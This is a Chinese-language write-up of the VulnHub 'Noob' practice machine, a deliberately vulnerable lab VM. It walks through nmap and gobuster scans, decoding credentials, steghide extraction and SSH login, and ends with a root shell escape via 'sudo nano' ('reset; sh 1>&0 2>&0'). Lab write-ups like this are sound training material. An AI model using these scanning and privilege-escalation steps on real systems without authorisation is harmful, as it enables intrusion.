Vulnhub Noob靶机复现(附提权)

一、安装靶机

下载地址:https://download.vulnhub.com/noob/Noob.ova

下载好后使用VM打开配置如下。

二、主机发现

使用nmap扫描确认靶机ip(192.168.29.138)

复制代码
nmap -sn 192.168.29.1/24

三、端口扫描

使用nmap工具扫描全部端口以防遗漏。

复制代码
nmap -A -p- 192.168.29.138

四、目录探测

使用kali里最全的大字典去扫描。扫描出来后进行访问,查看有哪些网页目录可以利用(不要网了敏感目录)。

复制代码
gobuster dir -u http://192.168.29.138/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php

五、web渗透/提权

端口扫描的时候知道我们的靶机开启了21端口ftp服务,而且里面有两个文件,下载下来看看。

cred里面的东西解码看一下是一个账号密码,应该是登录用的,welcome没啥用。

复制代码
Y2hhbXA6cGFzc3dvcmQ=

champ:password

点击About Us会下载一个压缩包,打开后就只有这些东西。图片应该还会有东西,使用工具提取一下,看看里面有什么我们没有注意到的。

bmp文件内存在隐写,查看内容。

复制代码
apt install steghide

steghide extract -sf funny.bmp
steghide info funny.jpg

cat user.txt
cat hint.py

将user.txt文件里的数据根据py文件的提示解密(rot加密)。或许是没有用到的55077端口ssh的账户密码

复制代码
wtf:this one is a simple one

还有一个55077端口的ssh服务,连接一下看看。

复制代码
ssh wtf@192.168.29.138 -p 55077

在目录下找出flag和backup文件里的另一个账户密码。

flag解码后没有啥用,切换到另一个用户里面。

查看可以使用root权限的文件

复制代码
sudo -l

执行下列命令提权

复制代码
sudo nano

Ctrl+r ,Ctrl+x

reset; sh 1>&0 2>&0

完结撒花✿✿ヽ(°▽°)ノ✿

相关推荐
喜欢的名字被抢了1 天前
Python实战:SQLAlchemy ORM与FastAPI项目集成
开发语言·python·sql·教程·fastapi
iReachers2 天前
EXE一机一码加密后无法运行?兼容模式解决方案
教程·一机一码·exe加密·兼容模式·软件无法运行
喜欢的名字被抢了2 天前
MySQL核心机制:事务、锁与存储引擎
数据库·sql·mysql·教程
喜欢的名字被抢了4 天前
MySQL基础入门:从零理解数据库与SQL
数据库·mysql·教程
VIP_CQCRE4 天前
用 Ace Data Cloud 快速接入 OpenAI Chat Completions:对话、流式、多轮和多模态一篇打通
python·ai·openai·api·教程
喜欢的名字被抢了4 天前
MongoDB生产实践:架构设计、分片集群与运维监控
数据库·mongodb·教程
CSharp精选营15 天前
WebSocket 快速入门教程(附示例源码)
websocket·教程·csharp·实时通信·asp.net-core
6v6-博客1 个月前
PyCharm 中调用项目内文件夹的 Python 文件方法
教程·6v6博客网
6v6-博客1 个月前
CLion 开发环境配置完全指南
教程
6v6-博客1 个月前
SquareLine Studio 中复制文件的方法
教程·6v6博客网